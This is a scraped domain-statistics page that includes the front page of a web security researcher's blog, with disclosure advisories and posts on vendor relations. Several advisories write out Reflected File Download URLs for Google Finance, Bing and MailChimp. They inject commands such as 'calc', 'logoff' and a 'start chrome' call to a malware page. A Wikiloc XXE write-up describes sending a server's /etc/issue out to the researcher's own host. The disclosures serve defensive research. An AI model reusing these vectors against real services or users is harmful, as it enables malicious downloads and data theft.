davidsopas.com David Sopas - Web Security Researcher - Hire Web Security

Title: David Sopas - Web Security Researcher - Hire Web Security
Keywords: xss, sql injection, my site was hacked, site defaced, rfd, csrf, bounty, reward
Description: Just another WordPress site
davidsopas.com is ranked 2237552 in the world (amongst the 40 million domains). A low-numbered rank means that this website gets lots of visitors. This site is relatively popular among users in the united states. It gets 50% of its traffic from the united states .This site is estimated to be worth $6,002. This site has a low Pagerank(0/10). It has 1 backlinks. davidsopas.com has 43% seo score.

davidsopas.com Information

Website / Domain: davidsopas.com
Website IP Address:
Domain DNS Server: ns2.linxisp.net,ns4.linxisp.net,ns3.linxisp.net,ns1.linxisp.net

davidsopas.com Rank

Alexa Rank: 2237552
Google Page Rank: 0/10 (Google Pagerank Has Been Closed)

davidsopas.com Traffic & Earnings

Purchase/Sale Value: $6,002
Daily Revenue: $16
Monthly Revenue $493
Yearly Revenue: $6,002
Daily Unique Visitors 1,513
Monthly Unique Visitors: 45,390
Yearly Unique Visitors: 552,245

davidsopas.com WebSite Httpheader

StatusCode 200
Content-Type text/html; charset=UTF-8
Date Tue, 16 Aug 2016 07:35:19 GMT
Server Apache

davidsopas.com Keywords accounting

Keyword Count Percentage
xss 7 0.11%
sql injection 0 0.00%
my site was hacked 0 0.00%
site defaced 0 0.00%
rfd 17 0.27%
csrf 1 0.02%
bounty 7 0.22%
reward 1 0.03%

davidsopas.com Traffic Sources Chart

davidsopas.com Similar Website

Domain Site Title

davidsopas.com Alexa Rank History Chart

davidsopas.com aleax

davidsopas.com Html To Plain Text

David Sopas - Web Security Researcher - Hire Web Security Home About Advisories Contacts RSS David Sopas web security researcher Home About Advisories Contacts RSS Advisories Edmodo XSS and HTML Injection Advisories Events Made Easy WordPress plugin CSRF + Persistent XSS Advisories Shopify open to a RFD attack Swag Tshirt, deck of cards and stickers from Cobalt.io Challenge Win $50 Amazon Gift card with a XSS challenge Advisories ArubaNetworks Avatar Image XSPA Bug Bounty , Swag First to reach 1000 rep score on Cobalt.io Advisories Desk.com Reflected Filename Download START READING 05/08/16 Advisories , Bug Bounty , Interesting Readings Latest work done Just to give a small update on my work… I’ve been more active on my Twitter account so follow me to get the latest updates on my security work ?? Also here are some work I’ve done: (Cobalt.io) – The Top 10 Vulnerabilities used by David Sopas to reach #1 at Cobalt (Char49) – Flash XSS on typewrite_header.swf (Char49) – Char49 helps Microsoft fix a Reflected File Download (Checkmarx) – When Booking Your Flight Become Dangerous Regarding conferences I’ve been on Join 2016 @Braga presenting the talk “Hacking from Black to White”. 0 likes no responses 24/03/16 Advisories , Bug Bounty # advisories, full disclosure, security researcher, uber, vendor Hey vendors, researchers are here to help Yesterday I was exchanging some messages on Twitter – specially with Kymberlee Price (from BugCrowd) – about the relationship between vendors and security researchers when disclosing a security issue. In my experience I know what’s the feeling of trying to help a vendor and they ignore you or in some extreme cases even “inviting” you to stop what you are doing on their website. Vendors need to understand that most security researchers are here to help – working in the same side against bad guys. The problem in this connection is trust. Vendors don’t trust researchers. Researchers are loosing trust on vendors. We need to fix it. I had a bad experience with lots of big IT companies. Specially the ones I usually use on their products. I don’t go around companies and test vulnerabilities like crazy. I just like to feel more secure when using some web application. In my opinion these are the main issues: Lack of information on where to report a security issue Security report gets lost in their support system The vendor don’t reply back or just say it will be forward to the developing team Vendor don’t update the security status Researcher could even get threatened about the report But not all vendors are like that. I already tried different approaches who seemed to work. Email the vendor giving them a small presentation telling who you are and ask for the right person to deal with a security threat After you got the email, try to schedule a online chat or even Skype meeting to establish some kind of trust between both parts. Talk about that you found, the consequences and a possible solution. If you manage to do all this I bet the treatment in the future will be better for you and for future researchers who try to contact them. You as a researcher have the responsibility to prepare the path and improve the communication between vendors. Don’t give them hell! Give them trust! Even on bug bounty programs you have issues. Vendors who reply to your report in 1 year without even worrying about getting the researcher a feedback like: We’re working on it. It will take some time, maybe weeks or months… Even yesterday – Sean Mealia wrote on his Twitter that Uber changed their in-scope program after he sent a couple of security issues. It also happened to me in a private program for a popular online newspaper. I reported a security issue where a attacker could steal users information and they categorized as “Informative” and fixed it in a couple of days. This type of situations are not good for the business. Vendors must respect the researchers and visa-versa. Well this are my thoughts about this, feel free to share yours in the comments section. For those who are interested about this topic I recommend watching the video of Kymberlee Price at Kaspersky Security Analyst Summit 2016. 0 likes no responses 21/01/16 Advisories # google, google finance, rfd Google Finance Reflected File Download Found this vulnerability when auditing other client. With this RFD you don’t need to create a page to force the download. The request for this Google JSON file already do this for us. When I noticed this request: http://www.google.com/finance/info?q=ELI:ALTR&callback=? Which returned the following information: // [ { "id": "703655" ,"t" : "ALTR" ,"e" : "ELI" ,"l" : "4.71" ,"l_fix" : "4.71" ,"l_cur" : "€4.71" ,"s": "0" ,"ltt":"5:35PM GMT+1" ,"lt" : "Dec 15, 5:35PM GMT+1" ,"lt_dts" : "2015-12-15T17:35:40Z" ,"c" : "+0.31" ,"c_fix" : "0.31" ,"cp" : "7.14" ,"cp_fix" : "7.14" ,"ccol" : "chg" ,"pcls_fix" : "4.396" } ] I wondered if that callback parameter could be manipulated. So I injected “calc” on the request: http://www.google.com/finance/info?q=ELI:ALTR&callback=calc Which returned the following information: // calc([ { "id": "703655" ,"t" : "ALTR" ,"e" : "ELI" ,"l" : "4.71" ,"l_fix" : "4.71" ,"l_cur" : "€4.71" ,"s": "0" ,"ltt":"5:35PM GMT+1" ,"lt" : "Dec 15, 5:35PM GMT+1" ,"lt_dts" : "2015-12-15T17:35:40Z" ,"c" : "+0.31" ,"c_fix" : "0.31" ,"cp" : "7.14" ,"cp_fix" : "7.14" ,"ccol" : "chg" ,"pcls_fix" : "4.396" } ] ); Done! Got my injected Windows command on this XHR request. Time to check if the URL is permissive: http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=calc Guess what? I got a URL that automatically shows the download dialog from Google with a batch file. I tried successfully with the following browsers: Firefox latest version Opera latest version Internet Explorer 8 and 9 What are the limitations? I noticed in my testing that most of the chars are being sanitized so it only allows you to use one command without spaces or arguments. Proof-of-concept: http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=calc [when the batch is executed the Windows calculator opens] http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=logoff [when the batch is executed the system logoffs the authenticated user] Possible attack scenario: Attacker sends the URL – http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=logoff – to the victim. Victim downloads the file and execute it. After execution of the batch file it will logoff the victim from the operating system. I made a small video that illustrates my proof-of-concept: Google decided that this issue has very little or no security impact. Personally I don’t agree but that’s my opinion ?? So this RFD is still unpatched. I hope they change their mind and fix this soon. 0 likes no responses 19/01/16 Advisories # acknowledgments, bing, microsoft, rfd Bing Reflected File Download When using Bing online translator I noticed a XHR request on my browser that caught my attention: http://www.bing.com/translator/LandingPage/GetDefinition?oncomplete=jQuery111207287312552798539_1444907172498&market=en&word=test&_=1444907172499 On which reflected on the screen: jQuery111207287312552798539_1444907172498(); As a security researcher I always try to find different ways to bypass security specially related to Reflected File Download. So I tried to inject a RFD vector on the parameter “oncomplete”: http://www.bing.com/translator/LandingPage/GetDefinition?oncomplete=start%20chrome%20davidsopas.com/poc/malware.htm On which reflected on the screen: start chrome davidsopas.com/poc/malware.htm(); Using the HTML5 download attribute I was able to send a security report to Microsoft which they fixed within a month. With this report I was listed on the Security Researcher Acknowledgments for Microsoft Online Services for the forth time. 0 likes no responses 18/01/16 Donations # cats, dogs, food, health, shelter Give! I’ve been blessed with the opportunity to help others in need so yesterday I delivered more food to a local animal shelter. I was received with a big smile and warm hug from the shelter owner. I also had the chance of checking a 22 year old female dog called “Docas”. Such a sweet thing ?? Also I contributed with the yearly maintenance of the web hosting and domain of a public health institution. They care so much for their patients and give their best everyday so I decided they deserve a small help from my part. Helping others is something that we all should do. You don’t need to donate money. Sometimes just listening is helping… 0 likes no responses 14/01/16 Tips and Tricks # .mario, event handlers, html5 201 event handlers supported by modern browsers An updated list of 201 event handlers supported by modern browsers https://t.co/KXTRx6PppO (and some old ones too) — .mario (@0x6D6172696F) December 26, 2015 0 likes no responses 11/01/16 Advisories # gps, gpx, wikiloc, xxe Wikiloc XXE vulnerability For those who still don’t know Wikiloc: Wikiloc is a place to discover and share the best outdoor trails for hiking, cycling and many other activities. We are 1,725,606 members exploring and sharing 3,936,841 outdoor trails and 6,503,289 photos. I was searching for a cool track to ride my bike [yes I love #cycling] and I created an account on Wikiloc. I already known the site but never registered. Such a cool site in my opinion. As a security researcher I always take a look on the web applications requests and transactions and after uploading a XML I remember to test Wikiloc for a XXE vulnerability. This is a very dangerous type of vulnerability and could be used by malicious users to compromise the server. So let me explain what I did: First I downloaded a .gpx file from Wikiloc to see the structure of the XML. I injected the following line on top of the file: ]>; And called the entity on the track name: ]> 2015-10-29T12:53:09Z &xxe; 178.000000 2009-01-10T14:18:10Z (...) I uploaded the .gpx file and voilá! Got a request made by Wikiloc server to my own: GET /XXE/ 10/29/15 1:02 PM Java/1.7.0_51 To make sure that was your server I resolved the IP which was master.wikiloc.com. I also know what version of Java they were are using – 1.7.0_51. But to show how dangerous it can be I wanted to test for external DTD and request a file hosted on Wikiloc server – /etc/issue [which will return the operating system used]. So I modified other .gpx file with the following code: %dtd;]> 2015-10-29T12:53:09Z &send; (...) xxe.dtd has the following XML code: "> %all; I uploaded the new .gpx file and got the following GET request on my server: GET /XXE/?Debian 10/29/15 1:12 PM Java/1.7.0_51 With XXE you can do a variaty of things. A malicious user could upload files, check source-code, launch DDoS attacks, you name it. This issue its already fixed by Wikiloc. They were very fast and concerned about this. It’s shows that they care about security. Also they provided me with a token of appreciation (they know exactly how to please a cyclist ?? ) and also put my name on their contributors list. Keep up the good work Wikiloc! 0 likes no responses 07/01/16 Swag # adobe, google, help, infosec, microsoft, yahoo Companies that I’ve helped improve their security Google, Yahoo!, eBay, Microsoft, Etsy, Nexmo, Weebly, Edmodo, HackerOne, Desk, Adobe, ArubaNetworks, Condé Nast, Linkedin, Acunetix, SendGrid, Rocky Bytes, DepositFiles, Workable, MailChimp, Prestashop, HP, Kaspersky, OLX, RunKeeper, Tumblr, ESET, Symantec, Dowjones, Issuu, Jobs.cz, Alexa/Amazon, McAfee, Booking, AVG, Panda Security, Hootsuite, Circle, DoSomething, Zendesk, Nokia, 123 Contact Form, FoxyCart, Orkut, Segment.io and SilentCircle. The other ones are private ?? 0 likes no responses 06/01/16 Interesting Readings , Tips and Tricks # bugbounty, patch, rfd, vendors Why some vendors ignore RFD attacks? Since I published my Reflected File Download Cheat Sheet I’m getting lot’s of private messages and emails from security researchers and bounty hunters telling that most companies ignore RFD attacks. So I decided to clear things up and answer three most popular questions. First a little introduction. In my opinion they’re three ways of implementing a successful RFD attack. URL address automatically prompts the download dialog in most popular browsers Attack is only available using a external page in modern browsers but works like (1) in Internet Explorer 8 and 9 browsers Attack is only available using a external page in modern browsers “Reflected File Download is a social engineering attack.” On attack scenario (1) the victim is prompted with a download dialog just by visiting/clicking the URL – just like a reflected XSS but here the victim downloads a file from a trusted source. In 90% of the cases the victim runs the file. Imagine having the following URL: https://www.google.com/app/setup.bat?callback=calc [It’s just an example, this will not work] If the victim runs the URL it will prompt the download of setup.bat. On Chrome you don’t need to see the source because you see the URL. On Firefox and IE you’ll the the source on the download dialog. Attack scenario (2) works like (1) in IE 8 and 9. Other browsers need a external page to work using HTML5 download attribute. The attackers in this last case need to launch a malicious campaign with that link. It’s like phishing emails but here the URL is from a trusted source. Imagine this attack scenario: Attacker creates a page with a RFD link to a hosting company That page offers domain or hosting promo codes When the victim checks the link (mouse hover or view the source code) it will see that’s from a trusted source [the hosting company] Victim clicks the link and downloads the file (when they view the source of the download they will see the hosting company) Victim gets hijacked On attack scenario (3) it’s the same scenario from (2) but don’t work as told before on IE 8 and 9. Some may consider (2) and (3) a social engineering attack. The attacker needs to attract victims into his RFD page. For me it’s a grey area. They’re lot’s of ways to bring victims to a malicious page [blackhat seo, forums, social networks] without too much trouble. The key point here is that the RFD URL is from a trusted source which give the victim a little of confidence that they will download something that is what they’re are loooking for. Companies that ignore this will have their reputation affected because they didn’t do anything to prevent this attack to their clients. “We can’t do anything about it. It’s a external page that we can’t control.” Wrong! On (1) you don’t need a external page. On (2) and (3) the affected companies can protect and prevent RFD attacks by forcing the filename: content-disposition:attachment; filename="f.txt" Even if the attacker external page is using: Click here It will try to download f.txt. Workable fix this by using the following: “Google don’t consider this to be a issue” Google has a specific page that tells security researchers that Reflected File Download security reports aren’t reliable for a reward. But at the end of the text you can read the following: Before sending a report please remember to include a realistic attack scenario, preferably, one that doesn’t require social engineering. I already sent two (1) issues to Google and they were both accepted. So always give a good attack scenario. I already helped most popular companies to fix Reflected File Download issues – Yahoo!, eBay, Microsoft, Google, Linkedin and many more. Keep your security report clear and complete. Don’t argue with the affected company about their opinion. It’s their prerogative to deny your security report. In the end it’s their decision. – Keep calm and carry on! Have a good and secure year of 2016 ?? 0 likes no responses 23/12/15 Advisories # cobalt.io, list-manage.com, mailchimp, rfd MailChimp Reflected File Download When auditing a MailChimp client for Cobalt.io I noticed that this company suffers from a Reflected File Download vulnerability that could be exploited only by using HTML5 download attribute. Let’s take a look into the original GET request: http://[mailchimp_client].us5.list-manage.com/subscribe/post-json?u=41352a29fd45def27e8aea4cd&id=91d16923d8&c=? This request is part of the subscription to a email campaign at MailChimp. Checking the URL you can see “c” parameter is nothing more than the callback: ?({“result”:”error”,”msg”:”Blank email address”}) Putting my RFD vector on the callback: http://[mailchimp_client].us5.list-manage.com/subscribe/post-json?u=41352a29fd45def27e8aea4cd&id=91d16923d8&c=start%20chrome%20davidsopas.com/poc/malware.htm|| I get the following reflected: start chrome davidsopas.com/poc/malware.htm||({“result”:”error”,”msg”:”Blank email address”}) Because list-manage.com is not URL permissive I needed to use a external page to create my proof-of-concept: Install MailChimp toolbar to improve your email send score! (Use "Save Link As" to download the file) So a possible attack scenario would be: Victim visits a page with a specially crafted page – like my PoC Victim downloads the file using Save Link As (which comes from a trusted domain – list-manage.com) Victim gets hijacked Because the download comes from a trusted domain, victims are tricked to execute files that are not suppose to. This works perfectly on latest versions of Google Chrome and Opera. MailChimp considered this issue to be a social engineering attack so they’ll not fix it. In my opinion this is something that this company could prevent from happening just by adding a header to their request. In the end it’s a MailChimp decision not mine. When I requested the disclosure of this report MailChimp replied: We neither condone nor prohibit you from adding this to your security blog. Hope it helps other companies and security researchers to better understand RFD… 0 likes no responses 1 2 3 4 … 7 Next Search Recent Posts Latest work done Hey vendors, researchers are here to help Google Finance Reflected File Download Bing Reflected File Download Give! Recent Comments apoorv munshi on Reflected File Download Cheat Sheet apoorv munshi on Reflected File Download Cheat Sheet Arbaz Hussain on Yahoo! and other sites vulnerable to Open Redirect Salem Elmrayed on Win $50 Amazon Gift card with a XSS challenge Blacksdawn on XSS on a input hidden field Archives August 2016 March 2016 January 2016 December 2015 November 2015 October 2015 September 2015 August 2015 Categories Advisories Bug Bounty Challenge Donations Interesting Readings Meetings News Papers Swag Tips and Tricks Warning Copyright ? 2015. DavidSopas.com - Follow this blog updates by RSS. This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish.Accept

davidsopas.com Whois

Registrar URL: http://www.godaddy.com
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Name Server: NS1.LINXISP.NET
Name Server: NS2.LINXISP.NET
DNSSEC: unsigned
For complete domain details go to:
The data contained in GoDaddy.com, LLC's WhoIs database,
while believed by the company to be reliable, is provided "as is"
with no guarantee or warranties regarding its accuracy. This
information is provided for the sole purpose of assisting you
in obtaining information about domain name registration records.
Any use of this data for any other purpose is expressly forbidden without the prior written
permission of GoDaddy.com, LLC. By submitting an inquiry,
you agree to these terms of usage and limitations of warranty. In particular,
you agree not to use this data to allow, enable, or otherwise make possible,
dissemination or collection of this data, in part or in its entirety, for any
purpose, such as the transmission of unsolicited advertising and
and solicitations of any kind, including spam. You further agree
not to use this data to enable high volume, automated or robotic electronic
processes designed to collect or compile this data for any purpose,
including mining this data for your own personal or commercial purposes.
Please note: the registrant of the domain name is specified
in the "registrant" section. In most cases, GoDaddy.com, LLC
is not the registrant of domain names listed in this database